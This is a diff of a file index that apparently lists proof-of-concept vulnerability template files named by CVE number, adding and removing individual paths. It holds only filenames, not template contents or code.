./poc/cve/cve-2020-11930-4444.yaml ./poc/cve/cve-2020-11930-4445.yaml ./poc/cve/cve-2020-11930-4446.yaml +./poc/cve/cve-2020-11978(1).yaml ./poc/cve/cve-2020-11978-4447.yaml ./poc/cve/cve-2020-11978-4448.yaml ./poc/cve/cve-2020-11978-4449.yaml 
@@ -40338,8 +40306,10 @@ ./poc/cve/cve-2020-12800-4486.yaml ./poc/cve/cve-2020-12800-4487.yaml ./poc/cve/cve-2020-12800-4488.yaml +./poc/cve/cve-2020-13117-4489.yaml ./poc/cve/cve-2020-13117-4490.yaml ./poc/cve/cve-2020-13117-4491.yaml +./poc/cve/cve-2020-13121(1).yaml ./poc/cve/cve-2020-13158-4492.yaml ./poc/cve/cve-2020-13158-4493.yaml ./poc/cve/cve-2020-13158-4494.yaml @@ -40387,6 +40357,7 @@ ./poc/cve/cve-2020-13942.yaml ./poc/cve/cve-2020-13945-4533.yaml ./poc/cve/cve-2020-13945-4534.yaml +./poc/cve/cve-2020-13945-4535.yaml ./poc/cve/cve-2020-14092-4536.yaml ./poc/cve/cve-2020-14092-4537.yaml ./poc/cve/cve-2020-14092-4538.yaml @@ -40402,8 +40373,6 @@ ./poc/cve/cve-2020-14181-4549.yaml ./poc/cve/cve-2020-14181-4550.yaml ./poc/cve/cve-2020-14181-4551.yaml -./poc/cve/cve-2020-14181.yaml -./poc/cve/cve-2020-14408(1).yaml ./poc/cve/cve-2020-14413-4552.yaml ./poc/cve/cve-2020-14413-4553.yaml ./poc/cve/cve-2020-14413-4554.yaml @@ -40433,6 +40402,7 @@ ./poc/cve/cve-2020-14882-4577.yaml ./poc/cve/cve-2020-14882-4578.yaml ./poc/cve/cve-2020-14882-4579.yaml +./poc/cve/cve-2020-14882.yaml ./poc/cve/cve-2020-14883-1.yaml ./poc/cve/cve-2020-14883-2.yaml ./poc/cve/cve-2020-14883-4580.yaml @@ -40561,7 +40531,6 @@ ./poc/cve/cve-2020-18268-4703.yaml ./poc/cve/cve-2020-19282-4704.yaml ./poc/cve/cve-2020-19282-4705.yaml -./poc/cve/cve-2020-19282-4706.yaml ./poc/cve/cve-2020-19283-4707.yaml ./poc/cve/cve-2020-19283-4708.yaml ./poc/cve/cve-2020-19283-4709.yaml @@ -40569,6 +40538,7 @@ ./poc/cve/cve-2020-19295-4711.yaml ./poc/cve/cve-2020-19295-4712.yaml ./poc/cve/cve-2020-19360-4713.yaml +./poc/cve/cve-2020-19360-4714.yaml ./poc/cve/cve-2020-1938-4715.yaml ./poc/cve/cve-2020-1938-4716.yaml ./poc/cve/cve-2020-1938-4717.yaml @@ -40587,7 +40557,6 @@ ./poc/cve/cve-2020-19719.yaml ./poc/cve/cve-2020-2036-1.yaml ./poc/cve/cve-2020-2036-2.yaml -./poc/cve/cve-2020-2036-4730.yaml ./poc/cve/cve-2020-2036-4731.yaml ./poc/cve/cve-2020-2036-4732.yaml ./poc/cve/cve-2020-2036-4733.yaml 
@@ -40597,7 +40566,6 @@ ./poc/cve/cve-2020-2096-4737.yaml ./poc/cve/cve-2020-2096-4738.yaml ./poc/cve/cve-2020-2096-4739.yaml -./poc/cve/cve-2020-20982-4740.yaml ./poc/cve/cve-2020-20982-4741.yaml ./poc/cve/cve-2020-20982-4742.yaml ./poc/cve/cve-2020-20982-4743.yaml @@ -40624,13 +40592,13 @@ ./poc/cve/cve-2020-22209(1).yaml ./poc/cve/cve-2020-22210(1).yaml ./poc/cve/cve-2020-22210-4760.yaml -./poc/cve/cve-2020-22211(1).yaml ./poc/cve/cve-2020-22840-4761.yaml ./poc/cve/cve-2020-22840-4763.yaml ./poc/cve/cve-2020-22840-4764.yaml ./poc/cve/cve-2020-22840-4765.yaml ./poc/cve/cve-2020-22840-4766.yaml ./poc/cve/cve-2020-22840-4767.yaml +./poc/cve/cve-2020-22840.yaml ./poc/cve/cve-2020-23015-4768.yaml ./poc/cve/cve-2020-23015-4769.yaml ./poc/cve/cve-2020-23015-4770.yaml @@ -40669,13 +40637,13 @@ ./poc/cve/cve-2020-24223-4802.yaml ./poc/cve/cve-2020-24223-4803.yaml ./poc/cve/cve-2020-24223-4804.yaml +./poc/cve/cve-2020-24223.yaml ./poc/cve/cve-2020-24312-4805.yaml ./poc/cve/cve-2020-24312-4806.yaml ./poc/cve/cve-2020-24312-4807.yaml ./poc/cve/cve-2020-24312-4808.yaml ./poc/cve/cve-2020-24312-4809.yaml ./poc/cve/cve-2020-24312-4810.yaml -./poc/cve/cve-2020-24391-4811.yaml ./poc/cve/cve-2020-24391-4812.yaml ./poc/cve/cve-2020-24391-4813.yaml ./poc/cve/cve-2020-24550-4814.yaml @@ -40760,7 +40728,6 @@ ./poc/cve/cve-2020-25540-4890.yaml ./poc/cve/cve-2020-25540-4891.yaml ./poc/cve/cve-2020-25540-4892.yaml -./poc/cve/cve-2020-25540.yaml ./poc/cve/cve-2020-2555.yaml ./poc/cve/cve-2020-25780-4893.yaml ./poc/cve/cve-2020-25780-4894.yaml @@ -40812,7 +40779,6 @@ ./poc/cve/cve-2020-27361-4947.yaml ./poc/cve/cve-2020-27467-4948.yaml ./poc/cve/cve-2020-27467-4949.yaml -./poc/cve/cve-2020-27467-4950.yaml ./poc/cve/cve-2020-27467-4951.yaml ./poc/cve/cve-2020-27735-4952.yaml ./poc/cve/cve-2020-27735-4953.yaml 
@@ -40849,6 +40815,7 @@ ./poc/cve/cve-2020-28871-4986.yaml ./poc/cve/cve-2020-28871-4987.yaml ./poc/cve/cve-2020-28871-4988.yaml +./poc/cve/cve-2020-28976-4989.yaml ./poc/cve/cve-2020-28976-4990.yaml ./poc/cve/cve-2020-28976-4991.yaml ./poc/cve/cve-2020-29164-4992.yaml @@ -40859,12 +40826,14 @@ ./poc/cve/cve-2020-29164-4997.yaml ./poc/cve/cve-2020-29227-4998.yaml ./poc/cve/cve-2020-29227-4999.yaml +./poc/cve/cve-2020-29227-5000.yaml ./poc/cve/cve-2020-29227-5001.yaml ./poc/cve/cve-2020-29395-5002.yaml ./poc/cve/cve-2020-29395-5003.yaml ./poc/cve/cve-2020-29395-5004.yaml ./poc/cve/cve-2020-29395-5005.yaml ./poc/cve/cve-2020-29395-5006.yaml +./poc/cve/cve-2020-29395.yaml ./poc/cve/cve-2020-29453-1.yaml ./poc/cve/cve-2020-29453-5007.yaml ./poc/cve/cve-2020-29453-5008.yaml @@ -40877,6 +40846,7 @@ ./poc/cve/cve-2020-3187-5015.yaml ./poc/cve/cve-2020-3187-5016.yaml ./poc/cve/cve-2020-3187-5017.yaml +./poc/cve/cve-2020-3452(1).yaml ./poc/cve/cve-2020-3452-1.yaml ./poc/cve/cve-2020-3452-2.yaml ./poc/cve/cve-2020-3452-5018.yaml @@ -40934,6 +40904,7 @@ ./poc/cve/cve-2020-35736-5072.yaml ./poc/cve/cve-2020-35749-5073.yaml ./poc/cve/cve-2020-35749-5074.yaml +./poc/cve/cve-2020-35749-5075.yaml ./poc/cve/cve-2020-35774-5076.yaml ./poc/cve/cve-2020-35774-5077.yaml ./poc/cve/cve-2020-35774-5078.yaml @@ -40987,6 +40958,7 @@ ./poc/cve/cve-2020-36365-5124.yaml ./poc/cve/cve-2020-36365-5125.yaml ./poc/cve/cve-2020-36365-5126.yaml +./poc/cve/cve-2020-36510(1).yaml ./poc/cve/cve-2020-3952-5127.yaml ./poc/cve/cve-2020-3952-5128.yaml ./poc/cve/cve-2020-3952-5129.yaml @@ -41088,7 +41060,6 @@ ./poc/cve/cve-2020-6287-5216.yaml ./poc/cve/cve-2020-6287-5217.yaml ./poc/cve/cve-2020-6287-5218.yaml -./poc/cve/cve-2020-6287.yaml ./poc/cve/cve-2020-6308-5219.yaml ./poc/cve/cve-2020-6308-5220.yaml ./poc/cve/cve-2020-6308-5221.yaml 
@@ -41141,7 +41112,6 @@ ./poc/cve/cve-2020-7961-5266.yaml ./poc/cve/cve-2020-7961-5267.yaml ./poc/cve/cve-2020-7961-5268.yaml -./poc/cve/cve-2020-7980(1).yaml ./poc/cve/cve-2020-8091-5269.yaml ./poc/cve/cve-2020-8091-5270.yaml ./poc/cve/cve-2020-8091-5271.yaml @@ -41183,6 +41153,7 @@ ./poc/cve/cve-2020-8194-5305.yaml ./poc/cve/cve-2020-8194-5306.yaml ./poc/cve/cve-2020-8194-5307.yaml +./poc/cve/cve-2020-8194.yaml ./poc/cve/cve-2020-8209-5308.yaml ./poc/cve/cve-2020-8209-5309.yaml ./poc/cve/cve-2020-8209-5310.yaml @@ -41193,6 +41164,7 @@ ./poc/cve/cve-2020-8209-5315.yaml ./poc/cve/cve-2020-8451.yaml ./poc/cve/cve-2020-8497-5316.yaml +./poc/cve/cve-2020-8497-5317.yaml ./poc/cve/cve-2020-8512-5318.yaml ./poc/cve/cve-2020-8512-5319.yaml ./poc/cve/cve-2020-8512-5320.yaml @@ -41205,11 +41177,13 @@ ./poc/cve/cve-2020-8515-5327.yaml ./poc/cve/cve-2020-8515-5328.yaml ./poc/cve/cve-2020-8515-5329.yaml +./poc/cve/cve-2020-8641-5330.yaml ./poc/cve/cve-2020-8641-5331.yaml ./poc/cve/cve-2020-8641-5332.yaml ./poc/cve/cve-2020-8641-5333.yaml ./poc/cve/cve-2020-8641-5334.yaml ./poc/cve/cve-2020-8644-5335.yaml +./poc/cve/cve-2020-8654(1).yaml ./poc/cve/cve-2020-8771-5336.yaml ./poc/cve/cve-2020-8771-5337.yaml ./poc/cve/cve-2020-8771-5338.yaml @@ -41234,6 +41208,7 @@ ./poc/cve/cve-2020-9036-5357.yaml ./poc/cve/cve-2020-9036-5358.yaml ./poc/cve/cve-2020-9036-5359.yaml +./poc/cve/cve-2020-9043(1).yaml ./poc/cve/cve-2020-9047-5360.yaml ./poc/cve/cve-2020-9047-5361.yaml ./poc/cve/cve-2020-9047-5362.yaml @@ -41308,6 +41283,7 @@ ./poc/cve/cve-2020-9757-5424.yaml ./poc/cve/cve-2020-9757-5425.yaml ./poc/cve/cve-2020-9757-5426.yaml +./poc/cve/cve-20200924a.yaml ./poc/cve/cve-2020–26073-4901.yaml ./poc/cve/cve-2020–26073-4903.yaml ./poc/cve/cve-2020–26073-4905.yaml 
@@ -41328,6 +41304,7 @@ ./poc/cve/cve-2021-1499-5440.yaml ./poc/cve/cve-2021-20031-5441.yaml ./poc/cve/cve-2021-20031-5442.yaml +./poc/cve/cve-2021-20038-5443.yaml ./poc/cve/cve-2021-20038-5444.yaml ./poc/cve/cve-2021-20038-5445.yaml ./poc/cve/cve-2021-20038-5446.yaml @@ -41375,7 +41352,6 @@ ./poc/cve/cve-2021-21234-5489.yaml ./poc/cve/cve-2021-21287-5490.yaml ./poc/cve/cve-2021-21287-5491.yaml -./poc/cve/cve-2021-21287-5492.yaml ./poc/cve/cve-2021-21307-5493.yaml ./poc/cve/cve-2021-21307-5494.yaml ./poc/cve/cve-2021-21307-5495.yaml @@ -41412,16 +41388,19 @@ ./poc/cve/cve-2021-21479-5524.yaml ./poc/cve/cve-2021-21479-5525.yaml ./poc/cve/cve-2021-21479-5526.yaml +./poc/cve/cve-2021-21745(1).yaml ./poc/cve/cve-2021-21745-5527.yaml ./poc/cve/cve-2021-21799(1).yaml ./poc/cve/cve-2021-21800(1).yaml ./poc/cve/cve-2021-21801-5528.yaml ./poc/cve/cve-2021-21801-5529.yaml ./poc/cve/cve-2021-21801-5530.yaml +./poc/cve/cve-2021-21801-5531.yaml ./poc/cve/cve-2021-21802-5532.yaml ./poc/cve/cve-2021-21802-5533.yaml ./poc/cve/cve-2021-21802-5534.yaml ./poc/cve/cve-2021-21802-5535.yaml +./poc/cve/cve-2021-21803-5536.yaml ./poc/cve/cve-2021-21803-5537.yaml ./poc/cve/cve-2021-21803-5538.yaml ./poc/cve/cve-2021-21803-5539.yaml @@ -41467,6 +41446,7 @@ ./poc/cve/cve-2021-22053-5579.yaml ./poc/cve/cve-2021-22053-5580.yaml ./poc/cve/cve-2021-22053-5581.yaml +./poc/cve/cve-2021-22054(1).yaml ./poc/cve/cve-2021-22054-5582.yaml ./poc/cve/cve-2021-22122-1.yaml ./poc/cve/cve-2021-22122-2.yaml @@ -41478,6 +41458,7 @@ ./poc/cve/cve-2021-22122-5588.yaml ./poc/cve/cve-2021-22145-5589.yaml ./poc/cve/cve-2021-22145-5590.yaml +./poc/cve/cve-2021-22145-5591.yaml ./poc/cve/cve-2021-22145-5592.yaml ./poc/cve/cve-2021-22205-5593.yaml ./poc/cve/cve-2021-22205-5594.yaml 
@@ -41487,7 +41468,6 @@ ./poc/cve/cve-2021-22214-5598.yaml ./poc/cve/cve-2021-22214-5599.yaml ./poc/cve/cve-2021-22214-5600.yaml -./poc/cve/cve-2021-22214-5601.yaml ./poc/cve/cve-2021-22214-5602.yaml ./poc/cve/cve-2021-22214-5603.yaml ./poc/cve/cve-2021-22873-1.yaml @@ -41503,6 +41483,7 @@ ./poc/cve/cve-2021-22873-5610.yaml ./poc/cve/cve-2021-22873-6.yaml ./poc/cve/cve-2021-22986-5611.yaml +./poc/cve/cve-2021-22986-5612.yaml ./poc/cve/cve-2021-22986-5613.yaml ./poc/cve/cve-2021-22986-5614.yaml ./poc/cve/cve-2021-22986-5615.yaml @@ -41511,6 +41492,7 @@ ./poc/cve/cve-2021-23241-5618.yaml ./poc/cve/cve-2021-23241-5619.yaml ./poc/cve/cve-2021-23241-5620.yaml +./poc/cve/cve-2021-23241-5621.yaml ./poc/cve/cve-2021-23241-5622.yaml ./poc/cve/cve-2021-23241-5623.yaml ./poc/cve/cve-2021-23241-5624.yaml @@ -41520,7 +41502,6 @@ ./poc/cve/cve-2021-24146-5628.yaml ./poc/cve/cve-2021-24146-5629.yaml ./poc/cve/cve-2021-24146-5630.yaml -./poc/cve/cve-2021-24146-5631.yaml ./poc/cve/cve-2021-24176-5632.yaml ./poc/cve/cve-2021-24176-5633.yaml ./poc/cve/cve-2021-24176-5634.yaml @@ -41543,7 +41524,6 @@ ./poc/cve/cve-2021-24235-5651.yaml ./poc/cve/cve-2021-24235-5652.yaml ./poc/cve/cve-2021-24235-5653.yaml -./poc/cve/cve-2021-24236(1).yaml ./poc/cve/cve-2021-24237-5654.yaml ./poc/cve/cve-2021-24237-5655.yaml ./poc/cve/cve-2021-24237-5656.yaml @@ -41551,7 +41531,6 @@ ./poc/cve/cve-2021-24274-5658.yaml ./poc/cve/cve-2021-24274-5659.yaml ./poc/cve/cve-2021-24274-5660.yaml -./poc/cve/cve-2021-24275-5661.yaml ./poc/cve/cve-2021-24275-5662.yaml ./poc/cve/cve-2021-24275-5663.yaml ./poc/cve/cve-2021-24276-5665.yaml 
@@ -41559,13 +41538,10 @@ ./poc/cve/cve-2021-24278-5667.yaml ./poc/cve/cve-2021-24278-5668.yaml ./poc/cve/cve-2021-24278-5669.yaml -./poc/cve/cve-2021-24284(1).yaml ./poc/cve/cve-2021-24285-5670.yaml ./poc/cve/cve-2021-24285-5671.yaml ./poc/cve/cve-2021-24285-5672.yaml -./poc/cve/cve-2021-24285-5673.yaml ./poc/cve/cve-2021-24285-5674.yaml -./poc/cve/cve-2021-24286(1).yaml ./poc/cve/cve-2021-24288-5675.yaml ./poc/cve/cve-2021-24288-5676.yaml ./poc/cve/cve-2021-24288-5677.yaml @@ -41595,6 +41571,7 @@ ./poc/cve/cve-2021-24320-5700.yaml ./poc/cve/cve-2021-24335-5701.yaml ./poc/cve/cve-2021-24335-5702.yaml +./poc/cve/cve-2021-24335-5703.yaml ./poc/cve/cve-2021-24335-5704.yaml ./poc/cve/cve-2021-24335-5705.yaml ./poc/cve/cve-2021-24340-5706.yaml @@ -41611,6 +41588,7 @@ ./poc/cve/cve-2021-24358-5718.yaml ./poc/cve/cve-2021-24364-5719.yaml ./poc/cve/cve-2021-24364-5720.yaml +./poc/cve/cve-2021-24364-5721.yaml ./poc/cve/cve-2021-24387-5722.yaml ./poc/cve/cve-2021-24387-5723.yaml ./poc/cve/cve-2021-24387-5725.yaml @@ -41635,13 +41613,13 @@ ./poc/cve/cve-2021-24472-5744.yaml ./poc/cve/cve-2021-24472-5745.yaml ./poc/cve/cve-2021-24472-5746.yaml +./poc/cve/cve-2021-24488(1).yaml ./poc/cve/cve-2021-24495-1.yaml ./poc/cve/cve-2021-24495-2.yaml ./poc/cve/cve-2021-24495-5747.yaml ./poc/cve/cve-2021-24495-5748.yaml ./poc/cve/cve-2021-24495-5749.yaml ./poc/cve/cve-2021-24495-5750.yaml -./poc/cve/cve-2021-24498-5751.yaml ./poc/cve/cve-2021-24498-5752.yaml ./poc/cve/cve-2021-24498-5753.yaml ./poc/cve/cve-2021-24498-5754.yaml @@ -41659,7 +41637,6 @@ ./poc/cve/cve-2021-24762-5766.yaml ./poc/cve/cve-2021-24838-5767.yaml ./poc/cve/cve-2021-24838-5768.yaml -./poc/cve/cve-2021-24838-5769.yaml ./poc/cve/cve-2021-24838-5770.yaml ./poc/cve/cve-2021-24926-5771.yaml ./poc/cve/cve-2021-24926-5772.yaml 
@@ -41679,7 +41656,6 @@ ./poc/cve/cve-2021-25028-5785.yaml ./poc/cve/cve-2021-25028-5786.yaml ./poc/cve/cve-2021-25028-5787.yaml -./poc/cve/cve-2021-25033(1).yaml ./poc/cve/cve-2021-25033-5788.yaml ./poc/cve/cve-2021-25052-5789.yaml ./poc/cve/cve-2021-25052-5790.yaml @@ -41693,12 +41669,13 @@ ./poc/cve/cve-2021-25074-5798.yaml ./poc/cve/cve-2021-25074-5799.yaml ./poc/cve/cve-2021-25074-5800.yaml -./poc/cve/cve-2021-25075(1).yaml +./poc/cve/cve-2021-25085(1).yaml ./poc/cve/cve-2021-25111-5801.yaml ./poc/cve/cve-2021-25111-5802.yaml ./poc/cve/cve-2021-25111-5803.yaml ./poc/cve/cve-2021-25112-5804.yaml ./poc/cve/cve-2021-25112-5805.yaml +./poc/cve/cve-2021-25118(1).yaml ./poc/cve/cve-2021-25120-5806.yaml ./poc/cve/cve-2021-25281-5807.yaml ./poc/cve/cve-2021-25281-5808.yaml @@ -41746,6 +41723,7 @@ ./poc/cve/cve-2021-26084-8.yaml ./poc/cve/cve-2021-26084-9-5834.yaml ./poc/cve/cve-2021-26084-9.yaml +./poc/cve/cve-2021-26085(1).yaml ./poc/cve/cve-2021-26085-5840.yaml ./poc/cve/cve-2021-26085-5841.yaml ./poc/cve/cve-2021-26085-5842.yaml @@ -41818,7 +41796,6 @@ ./poc/cve/cve-2021-27358-5908.yaml ./poc/cve/cve-2021-27358-5909.yaml ./poc/cve/cve-2021-27358-5910.yaml -./poc/cve/cve-2021-27519(1).yaml ./poc/cve/cve-2021-27561-5911.yaml ./poc/cve/cve-2021-27561-5912.yaml ./poc/cve/cve-2021-27561-5913.yaml @@ -41830,6 +41807,7 @@ ./poc/cve/cve-2021-27651-5919.yaml ./poc/cve/cve-2021-27651-5920.yaml ./poc/cve/cve-2021-27651-5921.yaml +./poc/cve/cve-2021-27748(1).yaml ./poc/cve/cve-2021-27748-5922.yaml ./poc/cve/cve-2021-27850-5923.yaml ./poc/cve/cve-2021-27850-5924.yaml @@ -41855,7 +41833,6 @@ ./poc/cve/cve-2021-28149-1.yaml ./poc/cve/cve-2021-28149-2.yaml ./poc/cve/cve-2021-28149-5942.yaml -./poc/cve/cve-2021-28149-5943.yaml ./poc/cve/cve-2021-28149-5944.yaml ./poc/cve/cve-2021-28149-5945.yaml ./poc/cve/cve-2021-28149-5946.yaml 
@@ -41863,7 +41840,6 @@ ./poc/cve/cve-2021-28150-2.yaml ./poc/cve/cve-2021-28150-5947.yaml ./poc/cve/cve-2021-28150-5948.yaml -./poc/cve/cve-2021-28150-5949.yaml ./poc/cve/cve-2021-28150-5950.yaml ./poc/cve/cve-2021-28151-1.yaml ./poc/cve/cve-2021-28151-2.yaml @@ -41881,6 +41857,7 @@ ./poc/cve/cve-2021-28169-5961.yaml ./poc/cve/cve-2021-28169-5962.yaml ./poc/cve/cve-2021-28169-5963.yaml +./poc/cve/cve-2021-28377(1).yaml ./poc/cve/cve-2021-28377-5964.yaml ./poc/cve/cve-2021-28377-5965.yaml ./poc/cve/cve-2021-28377-5966.yaml @@ -41895,6 +41872,7 @@ ./poc/cve/cve-2021-28918-2.yaml ./poc/cve/cve-2021-28918-3.yaml ./poc/cve/cve-2021-28918-5974.yaml +./poc/cve/cve-2021-28918-5975.yaml ./poc/cve/cve-2021-28918-5976.yaml ./poc/cve/cve-2021-28937-5977.yaml ./poc/cve/cve-2021-28937-5978.yaml @@ -41933,6 +41911,7 @@ ./poc/cve/cve-2021-29484-6008.yaml ./poc/cve/cve-2021-29490-6009.yaml ./poc/cve/cve-2021-29490-6010.yaml +./poc/cve/cve-2021-29490-6011.yaml ./poc/cve/cve-2021-29622-6012.yaml ./poc/cve/cve-2021-29622-6013.yaml ./poc/cve/cve-2021-29622-6014.yaml @@ -41941,7 +41920,6 @@ ./poc/cve/cve-2021-29622-6017.yaml ./poc/cve/cve-2021-29622-6018.yaml ./poc/cve/cve-2021-29622-6019.yaml -./poc/cve/cve-2021-29622.yaml ./poc/cve/cve-2021-29625-6020.yaml ./poc/cve/cve-2021-29625-6021.yaml ./poc/cve/cve-2021-29625-6022.yaml @@ -41979,6 +41957,7 @@ ./poc/cve/cve-2021-30461-6055.yaml ./poc/cve/cve-2021-30461-6056.yaml ./poc/cve/cve-2021-30461-6057.yaml +./poc/cve/cve-2021-30461.yaml ./poc/cve/cve-2021-30497-6058.yaml ./poc/cve/cve-2021-30497-6059.yaml ./poc/cve/cve-2021-30497-6060.yaml @@ -41989,7 +41968,6 @@ ./poc/cve/cve-2021-31249-6065.yaml ./poc/cve/cve-2021-31249-6066.yaml ./poc/cve/cve-2021-31249-6067.yaml -./poc/cve/cve-2021-31249-6068.yaml ./poc/cve/cve-2021-31249-6069.yaml ./poc/cve/cve-2021-31250-6071.yaml ./poc/cve/cve-2021-31250-6072.yaml 
@@ -42002,7 +41980,6 @@ ./poc/cve/cve-2021-3129-6080.yaml ./poc/cve/cve-2021-3129-6081.yaml ./poc/cve/cve-2021-3129-6082.yaml -./poc/cve/cve-2021-3129.yaml ./poc/cve/cve-2021-31537-6083.yaml ./poc/cve/cve-2021-31537-6084.yaml ./poc/cve/cve-2021-31537-6085.yaml @@ -42016,6 +41993,7 @@ ./poc/cve/cve-2021-31581-6092.yaml ./poc/cve/cve-2021-31581-6093.yaml ./poc/cve/cve-2021-31581-6094.yaml +./poc/cve/cve-2021-31589-6095.yaml ./poc/cve/cve-2021-31589-6096.yaml ./poc/cve/cve-2021-31602-1.yaml ./poc/cve/cve-2021-31602-2.yaml @@ -42024,7 +42002,6 @@ ./poc/cve/cve-2021-31602-6099.yaml ./poc/cve/cve-2021-31602-6100.yaml ./poc/cve/cve-2021-31682-6101.yaml -./poc/cve/cve-2021-31682-6102.yaml ./poc/cve/cve-2021-31682-6103.yaml ./poc/cve/cve-2021-31682-6104.yaml ./poc/cve/cve-2021-31755-6105.yaml @@ -42036,7 +42013,6 @@ ./poc/cve/cve-2021-31800-6111.yaml ./poc/cve/cve-2021-31800-6112.yaml ./poc/cve/cve-2021-31800-6113.yaml -./poc/cve/cve-2021-31805(1).yaml ./poc/cve/cve-2021-31856-6114.yaml ./poc/cve/cve-2021-31856-6115.yaml ./poc/cve/cve-2021-31856-6116.yaml @@ -42049,7 +42025,6 @@ ./poc/cve/cve-2021-32030-6123.yaml ./poc/cve/cve-2021-32172-6125.yaml ./poc/cve/cve-2021-32172-6126.yaml -./poc/cve/cve-2021-3223(1).yaml ./poc/cve/cve-2021-3223-6127.yaml ./poc/cve/cve-2021-3223-6128.yaml ./poc/cve/cve-2021-3223-6129.yaml @@ -42057,6 +42032,7 @@ ./poc/cve/cve-2021-3223-6131.yaml ./poc/cve/cve-2021-3223-6132.yaml ./poc/cve/cve-2021-32305-6133.yaml +./poc/cve/cve-2021-32305-6134.yaml ./poc/cve/cve-2021-32305-6135.yaml ./poc/cve/cve-2021-32305-6136.yaml ./poc/cve/cve-2021-32618-6137.yaml @@ -42097,6 +42073,7 @@ ./poc/cve/cve-2021-33357-6173.yaml ./poc/cve/cve-2021-33357-6174.yaml ./poc/cve/cve-2021-33357-6175.yaml +./poc/cve/cve-2021-33544-6176.yaml ./poc/cve/cve-2021-33544-6177.yaml ./poc/cve/cve-2021-33544-6178.yaml ./poc/cve/cve-2021-33544-6179.yaml 
@@ -42131,6 +42108,7 @@ ./poc/cve/cve-2021-33807-6208.yaml ./poc/cve/cve-2021-33807-6209.yaml ./poc/cve/cve-2021-33807-6210.yaml +./poc/cve/cve-2021-33807-6211.yaml ./poc/cve/cve-2021-33904-6212.yaml ./poc/cve/cve-2021-33904-6213.yaml ./poc/cve/cve-2021-33904-6214.yaml @@ -42140,6 +42118,7 @@ ./poc/cve/cve-2021-34370-6218.yaml ./poc/cve/cve-2021-34370-6219.yaml ./poc/cve/cve-2021-34370-6220.yaml +./poc/cve/cve-2021-34370-6221.yaml ./poc/cve/cve-2021-34429-1.yaml ./poc/cve/cve-2021-34429-2.yaml ./poc/cve/cve-2021-34429-6222.yaml @@ -42160,7 +42139,6 @@ ./poc/cve/cve-2021-34621-6235.yaml ./poc/cve/cve-2021-34640-6236.yaml ./poc/cve/cve-2021-34640-6237.yaml -./poc/cve/cve-2021-34643-6238.yaml ./poc/cve/cve-2021-34643-6239.yaml ./poc/cve/cve-2021-34805-6240.yaml ./poc/cve/cve-2021-34805-6241.yaml @@ -42169,7 +42147,6 @@ ./poc/cve/cve-2021-35265-1.yaml ./poc/cve/cve-2021-35265-2.yaml ./poc/cve/cve-2021-35265-6244.yaml -./poc/cve/cve-2021-35265-6245.yaml ./poc/cve/cve-2021-35265-6246.yaml ./poc/cve/cve-2021-35336-6247.yaml ./poc/cve/cve-2021-35336-6248.yaml @@ -42189,6 +42166,7 @@ ./poc/cve/cve-2021-36260-6262.yaml ./poc/cve/cve-2021-36260-6263.yaml ./poc/cve/cve-2021-36260-6264.yaml +./poc/cve/cve-2021-36356(1).yaml ./poc/cve/cve-2021-36380-6266.yaml ./poc/cve/cve-2021-36380-6267.yaml ./poc/cve/cve-2021-36450(1).yaml @@ -42204,9 +42182,9 @@ ./poc/cve/cve-2021-36749-6277.yaml ./poc/cve/cve-2021-36749-6278.yaml ./poc/cve/cve-2021-36749-6279.yaml -./poc/cve/cve-2021-37216-6280.yaml ./poc/cve/cve-2021-37216-6281.yaml ./poc/cve/cve-2021-37216-6282.yaml +./poc/cve/cve-2021-37416(1).yaml ./poc/cve/cve-2021-37538-6283.yaml ./poc/cve/cve-2021-37538-6284.yaml ./poc/cve/cve-2021-37538-6285.yaml @@ -42216,6 +42194,7 @@ ./poc/cve/cve-2021-37573-6289.yaml ./poc/cve/cve-2021-37573-6290.yaml ./poc/cve/cve-2021-37580-6291.yaml +./poc/cve/cve-2021-37580-6292.yaml ./poc/cve/cve-2021-37589(1).yaml ./poc/cve/cve-2021-37704-2.yaml ./poc/cve/cve-2021-37704-6293.yaml 
@@ -42244,17 +42223,19 @@ ./poc/cve/cve-2021-38702-6311.yaml ./poc/cve/cve-2021-38702-6312.yaml ./poc/cve/cve-2021-38702-6313.yaml +./poc/cve/cve-2021-38702-6314.yaml ./poc/cve/cve-2021-38704-6315.yaml ./poc/cve/cve-2021-38704-6316.yaml -./poc/cve/cve-2021-38704-6317.yaml ./poc/cve/cve-2021-38704-6318.yaml ./poc/cve/cve-2021-38751-6319.yaml +./poc/cve/cve-2021-38751-6320.yaml ./poc/cve/cve-2021-38751-6321.yaml ./poc/cve/cve-2021-38751-6322.yaml +./poc/cve/cve-2021-39211(1).yaml +./poc/cve/cve-2021-39226-6323.yaml ./poc/cve/cve-2021-39226-6324.yaml ./poc/cve/cve-2021-39226-6325.yaml ./poc/cve/cve-2021-39226-6326.yaml -./poc/cve/cve-2021-39312(1).yaml ./poc/cve/cve-2021-39312-6327.yaml ./poc/cve/cve-2021-39316-6328.yaml ./poc/cve/cve-2021-39316-6329.yaml @@ -42375,7 +42356,6 @@ ./poc/cve/cve-2021-41467-6440.yaml ./poc/cve/cve-2021-41467-6441.yaml ./poc/cve/cve-2021-41467-6442.yaml -./poc/cve/cve-2021-41569(1).yaml ./poc/cve/cve-2021-41569-6443.yaml ./poc/cve/cve-2021-41569-6444.yaml ./poc/cve/cve-2021-41648-6445.yaml @@ -42392,7 +42372,6 @@ ./poc/cve/cve-2021-41653-6457.yaml ./poc/cve/cve-2021-41653-6458.yaml ./poc/cve/cve-2021-41691-6459.yaml -./poc/cve/cve-2021-41691-6460.yaml ./poc/cve/cve-2021-41691-6461.yaml ./poc/cve/cve-2021-41773-6462.yaml ./poc/cve/cve-2021-41773-6463.yaml @@ -42479,7 +42458,6 @@ ./poc/cve/cve-2021-43810-6541.yaml ./poc/cve/cve-2021-43810-6542.yaml ./poc/cve/cve-2021-44077-6543.yaml -./poc/cve/cve-2021-44103(1).yaml ./poc/cve/cve-2021-44103-6544.yaml ./poc/cve/cve-2021-44228-6545.yaml ./poc/cve/cve-2021-44228-6546.yaml @@ -42492,6 +42470,8 @@ ./poc/cve/cve-2021-44451-6553.yaml ./poc/cve/cve-2021-44515-6554.yaml ./poc/cve/cve-2021-44521-6555.yaml +./poc/cve/cve-2021-44521-6556.yaml +./poc/cve/cve-2021-44528(1).yaml ./poc/cve/cve-2021-44528-6557.yaml ./poc/cve/cve-2021-44528-6558.yaml ./poc/cve/cve-2021-44528-6559.yaml 
